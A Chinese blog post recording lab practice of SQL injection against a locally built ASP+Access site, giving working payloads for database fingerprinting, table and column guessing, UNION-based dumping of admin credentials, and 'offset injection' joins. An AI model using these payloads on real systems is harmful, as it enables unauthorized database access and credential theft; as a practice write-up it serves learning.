0x00前言:在学校看完了ACCESS注入。但当时并没有电脑,所以做好了笔记

回到家自己搭建了一个有ACCESS注入的站进行练习,虽然这可能没有什么用处

毕竟现在大多的网站都有waf或安全狗。而且ACCESS注入也比较少了。

0x01准备:windows server 2008,小旋风,ASP+ACCESS注入的站源码

ASP+ACCESS注入源码的站:链接: https://pan.baidu.com/s/1abWdVMYV1SKVkeDTYNDoiA 密码: x85v

然后去下载小旋风,这里就不给链接了。自己去下

安好小旋风后打开的页面是这样子

127.0.0.1/index.asp

安装好之后将源码扔www目录。然后进去

搭建好了的。

0x02正文:搭建好了之后,我们就开始注入吧。随便点个链接

and 1=1 返回正常页面

and 1=2 报错返回错误页面

首先得猜数据库类型

and exsits (select * from msysobjects)>0

这个库只有ACCESS数据库才有,如果报没有权限读取或者不报错 就代表该站的数据库是ACCESS

猜表and exists (select * from 表名)

这里我猜的是admin表。如果页面返回正常代表存在该表如果不存在则代表没有该表

猜字段 and exists (select password from admin) 如果存在该字段返回正常页面否则报错

存在password这个字段。

等一下我会介绍一个叫做偏移注入的方法用于知道表名不知道字段

知道字段后我们去猜字段

order by 22 猜字段就是从1开始直到报错的前一个

这里字段长度是22位

知道字段长度后我们去爆显位

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin

3是你的表名,15是你的字段名

union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

得到md5后我们就扔到md5解密

密码是bendss

进后台一试

登入成功

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

偏移注入介绍:偏移注入主要用于知道表名而不是字段才使用的,而且只能ACCESS数据库才能使用偏移注入。

首先我们得猜表名然后直接猜字段长度,然后直接爆显位

and exists (select * from admin)

order by 21

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin

第一步:用*来代替字段,一个一个的替换直到正确 (跳过)

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,* from admin

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin 返回正常。

带入公式计算:

22-16=6 原字段长度-*代替字段的长度=表名下拥有的字段   admin表下有6个字段

22-6*2=10 原字段长度-表名下拥有的字段*2=偏移注入的位置 偏移注入点位置在10

union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin b on a.id=b.id) 偏移一级注入

并没有爆出用户名和字段,这不奇怪,因为偏移注入是随机爆的。偏移注入是看运气的

偏移二级注入:

一级偏移注入的位置-拥有的字段=偏移二级注入的位置

10-6=4

union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as bon a.id=b.id) inner join admin as c on a.id=c.id)

偏移注入总结:字段越少越好

复习ACCESS注入的更多相关文章

  1. SQLMAP学习笔记1 access注入

    SQLMAP学习笔记1  access注入 Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL.Oracle.PostgreSQL.Microsoft S ...

  2. WEB安全 asp+access注入

    asp+access注入 数据库 (access数据库没有数据库名) 表名 字段(列名) 记录(行,内容) 注入常用函数: top n 表示查询结果的第n个记录 len() 函数返回文本字段中值的长度 ...

  3. access注入

    前面有自己总结详细的mysql注入,自己access注入碰到的比较少,虽然比较简单,但是这里做一个总结 union联合查询法: 因为union前后字段数相同,所以可以先用order by 22 使查询 ...

  4. access注入篇+sqlmap

    access数据库的来历,我就不说了,因为我懒的记,就算记了感觉上也没大多用处,只要记得数据库的结构就行了.先是表名,然后是列名,再者就是数据,我发个实际的图吧,大概就是这么一个结构. 下面,开始说下 ...

  5. 1.羽翼sqlmap学习笔记之Access注入

    使用sqlmap工具进行Acces注入:1.判断一个url是否存在注入点,根据返回数据判断数据库类型: .sqlmap.py -u "http://abcd****efg.asp?id=7& ...

  6. access注入 - 联合查询

    1.access数据库简介 简介:Microsoft Office Access是由微软发布的关系数据库管理系统.它结合了 MicrosoftJet Database Engine 和 图形用户界面两 ...

  7. 老调重弹-access注入过主机卫

    本文作者:i春秋签约作家——非主流 大家好,我是来自农村的非主流,今天就给在座的各位表演个绝活. 首先打开服务器上安装了主机卫士的网站. 尝试在变量id的值后面插入万恶的单引号,根据报错,我们可以分析 ...

  8. WEB安全 ACCESS 注入、盲注脚本

    http://www.xxx.cn/cp.asp?classid=3http://www.xxx.cn/cp.asp?classid=3 and //有拦截关键字http://www.xxx.cn/c ...

  9. sql注入--access

    access数据库结构: 表名  -->  列名  -->  数据 access注入攻击片段 联合查询法: (1)  判断注入点:  ?id=1 and 1=1 ; ?id=1 and 1 ...

随机推荐

  1. java编程思想第四版第二章要点总结

    1. 基本类型 基本类型 二进制位数 包装器类 boolean - Boolean byte 8 Byte char 16 Character short 16 Short int 32 Intege ...

  2. HttpClient调用RestFul接口(post和get方式)

    /** * @version V1.0 * @Description 调用http接口工具类 * @Author pc * @Date 2018/3/2 11:03 */public class Ht ...

  3. js获取文本的行数

    <div class="txt" style="line-height:30px">我是文字<br>我是文字<br>我是文字 ...

  4. mysql分区之range分区

    随着互联网的发展,各方面的数据越来越多,从最近两年大数据越来越强的呼声中就可见一斑. 我们所做的项目虽算不上什么大项目,但是由于业务量的问题,数据也是相当的多. 数据一多,就很容易出现性能问题,而为了 ...

  5. 解决 Cannot find OpenSSL's <evp.h> 和sasl.h not found!

    编译mongodb拓展出现 Cannot find OpenSSL's <evp.h> 解决方法:安装openssl yum install openssl openssl-devel 出 ...

  6. 【php】windows安装PHP5.5+Apache2.4

    php5.5和apache2.4的整合 看到php的版本升级了,就想试下新的特性 一.准备下载的文件 apache2.4.9 http://www.apachelounge.com/download/

  7. HighCharts之气泡图

    HighCharts之气泡图 1.HighCharts之气泡图源码 bubble.html: <!DOCTYPE html> <html> <head> <m ...

  8. freemarker写select组件(五)

    freemarker写select组件 1.宏定义 <#macro select id datas value="" key="" text=" ...

  9. 细说Ajax跨域

    一.什么是跨域 跨域问题来自于浏览器同源策略的限制,包括DOM同源限制和Ajax同源限制,本文探讨的是Ajax跨域.Ajax跨域指的是一个页面的Ajax只能请求和当前页面同源的数据,如果发现请求到的数 ...

  10. 【CJOJ2512】gcd之和(莫比乌斯反演)

    [CJOJ2512]gcd之和(莫比乌斯反演) 题面 给定\(n,m(n,m<=10^7)\) 求 \[\sum_{i=1}^n\sum_{j=1}^mgcd(i,j)\] 题解 首先把公因数直 ...